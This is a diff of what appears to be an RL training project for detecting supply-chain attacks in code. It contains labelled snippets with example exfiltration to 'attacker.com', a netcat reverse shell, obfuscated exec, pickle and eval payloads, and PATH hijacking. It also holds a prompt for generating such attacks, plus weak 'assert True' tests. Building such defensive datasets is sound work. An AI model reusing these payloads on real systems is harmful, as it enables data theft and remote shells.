+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\nclass Queue:\n \"\"\"A simple queue implementation.\"\"\"\n def __init__(self):\n self.items = []\n \n def enqueue(self, item):\n self.items.insert(0, item)\n \n def dequeue(self):\n if not self.is_empty():\n return self.items.pop()\n return None\n \n def is_empty(self):\n return len(self.items) == 0",
86
+ "patch": null,
87
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
88
+ "label": "benign",
89
+ "source": "mutation_engine",
90
+ "attack_type": null
91
+ },
92
+ {
93
+ "id": "fn_afb2fb13",
94
+ "type": "functional",
95
+ "code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
96
+ "patch": null,
97
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
98
+ "label": "benign",
99
+ "source": "mutation_engine",
100
+ "attack_type": null
101
+ },
102
+ {
103
+ "id": "fn_7d9c3863",
104
+ "type": "functional",
105
+ "code_snippet": "def binary_search(arr, target):\n \"\"\"Perform binary search.\"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return -1",
106
+ "patch": null,
107
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
108
+ "label": "benign",
109
+ "source": "mutation_engine",
110
+ "attack_type": null
111
+ },
112
+ {
113
+ "id": "fn_81a53eff",
114
+ "type": "functional",
115
+ "code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
116
+ "patch": null,
117
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
118
+ "label": "benign",
119
+ "source": "mutation_engine",
120
+ "attack_type": null
121
+ },
122
+ {
123
+ "id": "tp_dd51805d",
124
+ "type": "true_positive",
125
+ "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
126
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
127
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
128
+ "label": "malicious",
129
+ "source": "mutation_engine",
130
+ "attack_type": "obfuscated_exec"
131
+ },
132
+ {
133
+ "id": "tp_82f7c7df",
134
+ "type": "true_positive",
135
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
136
+ "patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
137
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
138
+ "label": "malicious",
139
+ "source": "mutation_engine",
140
+ "attack_type": "env_hijack"
141
+ },
142
+ {
143
+ "id": "tp_4112a517",
144
+ "type": "true_positive",
145
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
146
+ "patch": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
147
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
148
+ "label": "malicious",
149
+ "source": "mutation_engine",
150
+ "attack_type": "socket_exfil"
151
+ },
152
+ {
153
+ "id": "fp_1a5da2e5",
154
+ "type": "false_positive",
155
+ "code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
156
+ "patch": null,
157
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
158
+ "label": "benign",
159
+ "source": "mutation_engine",
160
+ "attack_type": null
161
+ },
162
+ {
163
+ "id": "tp_3fa65759",
164
+ "type": "true_positive",
165
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
166
+ "patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
167
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
168
+ "label": "malicious",
169
+ "source": "mutation_engine",
170
+ "attack_type": "socket_exfil"
171
+ },
172
+ {
173
+ "id": "fn_c40125ae",
174
+ "type": "functional",
175
+ "code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
176
+ "patch": null,
177
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
178
+ "label": "benign",
179
+ "source": "mutation_engine",
180
+ "attack_type": null
181
+ },
182
+ {
183
+ "id": "tp_7ac28ccc",
184
+ "type": "true_positive",
185
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
186
+ "patch": "def format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
187
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
188
+ "label": "malicious",
189
+ "source": "mutation_engine",
190
+ "attack_type": "eval_hidden"
191
+ },
192
+ {
193
+ "id": "tp_e1848067",
194
+ "type": "true_positive",
195
+ "code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
196
+ "patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
197
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
198
+ "label": "malicious",
199
+ "source": "mutation_engine",
200
+ "attack_type": "pickle_deserialization"
201
+ },
202
+ {
203
+ "id": "fp_382449d8",
204
+ "type": "false_positive",
205
+ "code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
206
+ "patch": null,
207
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
208
+ "label": "benign",
209
+ "source": "mutation_engine",
210
+ "attack_type": null
211
+ },
212
+ {
213
+ "id": "fp_5448737e",
214
+ "type": "false_positive",
215
+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
216
+ "patch": null,
217
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
218
+ "label": "benign",
219
+ "source": "mutation_engine",
220
+ "attack_type": null
221
+ },
222
+ {
223
+ "id": "tp_067c7620",
224
+ "type": "true_positive",
225
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
226
+ "patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
227
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
228
+ "label": "malicious",
229
+ "source": "mutation_engine",
230
+ "attack_type": "malicious_import"
231
+ },
232
+ {
233
+ "id": "tp_30239b19",
234
+ "type": "true_positive",
235
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
236
+ "patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
237
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
238
+ "label": "malicious",
239
+ "source": "mutation_engine",
240
+ "attack_type": "malicious_import"
241
+ },
242
+ {
243
+ "id": "fn_cf514ff8",
244
+ "type": "functional",
245
+ "code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
246
+ "patch": null,
247
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
248
+ "label": "benign",
249
+ "source": "mutation_engine",
250
+ "attack_type": null
251
+ },
252
+ {
253
+ "id": "tp_b9c23fd5",
254
+ "type": "true_positive",
255
+ "code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
256
+ "patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
257
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
258
+ "label": "malicious",
259
+ "source": "mutation_engine",
260
+ "attack_type": "typosquatting"
261
+ },
262
+ {
263
+ "id": "tp_18963f71",
264
+ "type": "true_positive",
265
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
266
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
267
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
268
+ "label": "malicious",
269
+ "source": "mutation_engine",
270
+ "attack_type": "eval_hidden"
271
+ },
272
+ {
273
+ "id": "tp_4c4f927a",
274
+ "type": "true_positive",
275
+ "code_snippet": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
276
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
277
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
278
+ "label": "malicious",
279
+ "source": "mutation_engine",
280
+ "attack_type": "subprocess_backdoor"
281
+ },
282
+ {
283
+ "id": "tp_4ea9d228",
284
+ "type": "true_positive",
285
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
286
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
287
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
288
+ "label": "malicious",
289
+ "source": "mutation_engine",
290
+ "attack_type": "env_hijack"
291
+ },
292
+ {
293
+ "id": "tp_f417c9df",
294
+ "type": "true_positive",
295
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
296
+ "patch": "def is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
297
+ "unit_test_code": "import code\nassert code.is_prime(7) == True\n",
298
+ "label": "malicious",
299
+ "source": "mutation_engine",
300
+ "attack_type": "env_hijack"
301
+ },
302
+ {
303
+ "id": "tp_bde0820e",
304
+ "type": "true_positive",
305
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
306
+ "patch": "def parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
307
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
308
+ "label": "malicious",
309
+ "source": "mutation_engine",
310
+ "attack_type": "env_hijack"
311
+ },
312
+ {
313
+ "id": "fn_d6a7e145",
314
+ "type": "functional",
315
+ "code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
316
+ "patch": null,
317
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
318
+ "label": "benign",
319
+ "source": "mutation_engine",
320
+ "attack_type": null
321
+ },
322
+ {
323
+ "id": "tp_69568e28",
324
+ "type": "true_positive",
325
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
326
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
327
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
328
+ "label": "malicious",
329
+ "source": "mutation_engine",
330
+ "attack_type": "socket_exfil"
331
+ },
332
+ {
333
+ "id": "fn_7abd4b1e",
334
+ "type": "functional",
335
+ "code_snippet": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
336
+ "patch": null,
337
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
338
+ "label": "benign",
339
+ "source": "mutation_engine",
340
+ "attack_type": null
341
+ },
342
+ {
343
+ "id": "fp_56b026a4",
344
+ "type": "false_positive",
345
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n \"\"\"Parse simple log lines into level and message.\"\"\"\n parsed = []\n for line in log_lines:\n parts = line.split(' - ', 1)\n if len(parts) == 2:\n parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n return parsed",
346
+ "patch": null,
347
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
348
+ "label": "benign",
349
+ "source": "mutation_engine",
350
+ "attack_type": null
351
+ },
352
+ {
353
+ "id": "fn_9691b992",
354
+ "type": "functional",
355
+ "code_snippet": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
356
+ "patch": null,
357
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
358
+ "label": "benign",
359
+ "source": "mutation_engine",
360
+ "attack_type": null
361
+ },
362
+ {
363
+ "id": "fp_477c7ba9",
364
+ "type": "false_positive",
365
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
366
+ "patch": null,
367
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
368
+ "label": "benign",
369
+ "source": "mutation_engine",
370
+ "attack_type": null
371
+ },
372
+ {
373
+ "id": "fp_f65258dd",
374
+ "type": "false_positive",
375
+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef celsius_to_fahrenheit(c):\n \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n return (f - 32) * 5/9",
376
+ "patch": null,
377
+ "unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
378
+ "label": "benign",
379
+ "source": "mutation_engine",
380
+ "attack_type": null
381
+ },
382
+ {
383
+ "id": "fn_7ed224be",
384
+ "type": "functional",
385
+ "code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
386
+ "patch": null,
387
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
388
+ "label": "benign",
389
+ "source": "mutation_engine",
390
+ "attack_type": null
391
+ },
392
+ {
393
+ "id": "tp_6523f26b",
394
+ "type": "true_positive",
395
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
396
+ "patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
397
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
398
+ "label": "malicious",
399
+ "source": "mutation_engine",
400
+ "attack_type": "eval_hidden"
401
+ }
402
+ ]
sentinel_synth/data/sdk_config.yaml ADDED
@@ -0,0 +1,33 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Meta Synthetic Data Kit Configuration for Sentinel-Synth
2
+ # This file defines how the SDK should generate synthetic vulnerabilities.
3
+
4
+ vllm:
5
+ api_base: "http://localhost:8000/v1"
6
+ model: "meta-llama/Llama-3.1-8B-Instruct"
7
+
8
+ generation:
9
+ temperature: 0.8
10
+ top_p: 0.95
11
+ max_tokens: 1024
12
+ num_pairs: 5 # Number of examples per ingest chunk
13
+
14
+ prompts:
15
+ # Standard prompt for generating malicious supply-chain code
16
+ code_generation: |
17
+ You are a cybersecurity research assistant specializing in supply-chain security.
18
+ Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
19
+ The vulnerability should be one of:
20
+ - Typosquatting (importing a malicious package similar to a popular one)
21
+ - Obfuscated execution (exec/eval with base64/zlib encoding)
22
+ - Environment hijacking (modifying PATH or other critical env vars)
23
+ - Subprocess backdoors (reverse shells or hidden command execution)
24
+ - Malicious __import__ tricks
25
+
26
+ After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
27
+ Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
28
+
29
+ Format the output as a JSON object with keys:
30
+ - code_snippet: the vulnerable code
31
+ - patch: the fixed code
32
+ - unit_test_code: the validation test
33
+ - attack_type: the category of the attack
sentinel_synth/envs/__init__.py ADDED
File without changes
sentinel_synth/envs/sentinel_env.py ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import gymnasium as gym
2
+ from gymnasium import spaces
3
+ import json
4
+ import numpy as np
5
+ from pathlib import Path
6
+ import random
7
+
8
+ from ..validation.docker_runner import run_code
9
+ from ..validation.patch_validator import validate_patch
10
+
11
+ class SentinelEnv(gym.Env):
12
+ """
13
+ Gymnasium environment for Sentinel-Synth
14
+ """
15
+ metadata = {"render_modes": ["human"]}
16
+
17
+ ACTION_ANALYZE = 0
18
+ ACTION_EXECUTE_SANDBOX = 1
19
+ ACTION_BLOCK_PR = 2
20
+ ACTION_SUBMIT_PATCH = 3
21
+ ACTION_REQUEST_REVIEW = 4
22
+
23
+ def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
24
+ super().__init__()
25
+
26
+ self.use_docker = use_docker
27
+ self.scenarios_path = scenarios_path
28
+ self.scenarios = self._load_scenarios()
29
+
30
+ self.current_scenario = None
31
+ self.step_counter = 0
32
+ self.max_steps = 5
33
+
34
+ # Define Observation Space
35
+ # text max length 5000 chars
36
+ self.observation_space = spaces.Dict(
37
+ {
38
+ "code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
39
+ "static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
40
+ "risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
41
+ }
42
+ )
43
+
44
+ # Define Action Space
45
+ self.action_space = spaces.Discrete(5)
46
+
47
+ def _load_scenarios(self):
48
+ try:
49
+ with open(self.scenarios_path, "r") as f:
50
+ return json.load(f)
51
+ except Exception as e:
52
+ print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
53
+ return []
54
+
55
+ def _compute_static_flags(self, code_snippet: str):
56
+ flags = np.zeros(5, dtype=np.int32)
57
+
58
+ if "eval(" in code_snippet or "exec(" in code_snippet:
59
+ flags[0] = 1
60
+ if "subprocess" in code_snippet or "os.system" in code_snippet:
61
+ flags[1] = 1
62
+ if "socket" in code_snippet or "requests" in code_snippet:
63
+ flags[2] = 1
64
+ if "os.environ" in code_snippet:
65
+ flags[3] = 1
66
+ if "base64" in code_snippet or "zlib" in code_snippet:
67
+ flags[4] = 1
68
+
69
+ return flags
70
+
71
+ def _get_obs(self):
72
+ code = self.current_scenario["code_snippet"]
73
+ # truncate code to 5000 chars to fit text space
74
+ if len(code) > 5000:
75
+ code = code[:5000]
76
+
77
+ flags = self._compute_static_flags(code)
78
+ risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)
79
+
80
+ return {
81
+ "code_snippet": code,
82
+ "static_flags": flags,
83
+ "risk_score": risk_score
84
+ }
85
+
86
+ def reset(self, seed=None, options=None):
87
+ super().reset(seed=seed)
88
+
89
+ if not self.scenarios:
90
+ # Fallback if no scenarios to prevent crash
91
+ self.current_scenario = {
92
+ "id": "fallback", "type": "functional", "label": "benign",
93
+ "code_snippet": "print('hello')", "patch": None
94
+ }
95
+ else:
96
+ # We can optionally pass a specific scenario via options
97
+ if options and "scenario" in options:
98
+ self.current_scenario = options["scenario"]
99
+ else:
100
+ self.current_scenario = random.choice(self.scenarios)
101
+
102
+ self.step_counter = 0
103
+ self.last_action = None
104
+ self.last_reward = 0
105
+
106
+ return self._get_obs(), {}
107
+
108
+ def step(self, action):
109
+ self.step_counter += 1
110
+
111
+ reward = 0
112
+ done = False
113
+ info = {}
114
+
115
+ self.last_action = action
116
+
117
+ if action == self.ACTION_ANALYZE:
118
+ # Small exploration reward for analyzing
119
+ reward = 0.05
120
+ info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}
121
+
122
+ elif action == self.ACTION_EXECUTE_SANDBOX:
123
+ # Execute code snippet
124
+ result = run_code(self.current_scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
125
+ info = {"telemetry": result}
126
+ # Shaped reward for gathering info
127
+ reward = 0.1
128
+
129
+ elif action == self.ACTION_BLOCK_PR:
130
+ if self.current_scenario["label"] == "malicious":
131
+ reward = 1.5 # Correctly blocked
132
+ else:
133
+ reward = -2.0 # False positive block
134
+ done = True
135
+
136
+ elif action == self.ACTION_SUBMIT_PATCH:
137
+ scenario_patch = self.current_scenario.get("patch")
138
+ if not scenario_patch:
139
+ if self.current_scenario["label"] == "benign":
140
+ # Benign code doesn't need a patch, but submitting one is a mistake
141
+ reward = -1.0
142
+ else:
143
+ # Should have a patch for malicious, but it's missing in scenario?
144
+ reward = -0.5
145
+ else:
146
+ success, msg, details = validate_patch(self.current_scenario, scenario_patch, use_docker=self.use_docker)
147
+ info = {"validation_success": success, "msg": msg, "details": details}
148
+
149
+ if success:
150
+ if self.current_scenario["label"] == "malicious":
151
+ reward = 4.0 # High reward for fixing vulnerability
152
+ else:
153
+ reward = -2.5 # High penalty for breaking benign code
154
+ else:
155
+ reward = -1.5 # Patch failed validation
156
+ done = True
157
+
158
+ elif action == self.ACTION_REQUEST_REVIEW:
159
+ if self.current_scenario["type"] == "false_positive":
160
+ reward = 0.5 # Good choice for ambiguous cases
161
+ else:
162
+ reward = 0.0
163
+ done = True
164
+ info = {"review_requested": True}
